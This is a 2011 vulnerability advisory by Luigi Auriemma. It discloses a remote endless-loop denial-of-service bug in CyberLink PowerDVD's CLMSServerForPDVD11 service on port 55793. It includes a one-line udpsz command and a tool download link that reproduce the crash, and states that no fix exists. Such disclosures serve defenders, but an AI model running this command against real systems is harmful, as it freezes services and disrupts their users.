#######################################################################

                             Luigi Auriemma

Application:  CyberLink PowerDVD
              http://www.cyberlink.com/products/powerdvd/overview_en_US.html
Versions:     <= 11.0.0.2114 (CLMSServerForPDVD11 2.0.0.9226)
Platforms:    Windows
Bug:          CLMSServerForPDVD11 endless loop
Exploitation: remote
Date:         03 Dec 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


PowerDVD is a software for viewing and sharing media contents on PC.

About CLMSServerForPDVD11:
"It allows PowerDVD Remote (Android) to discover the remote service on
the PC. Once service is discovered, PowerDVD Remote (Android) may
establish the connection with PowerDVD main application process for
interopt."


#######################################################################

======
2) Bug
======


The CLMSServer service is affected by an endless loop exploitable
through a malformed HTTP request sent to port 55793.
The effects are the freezing of the service and CPU at 100%.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

udpsz -c "\r\n\r\n" -T SERVER 55793 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################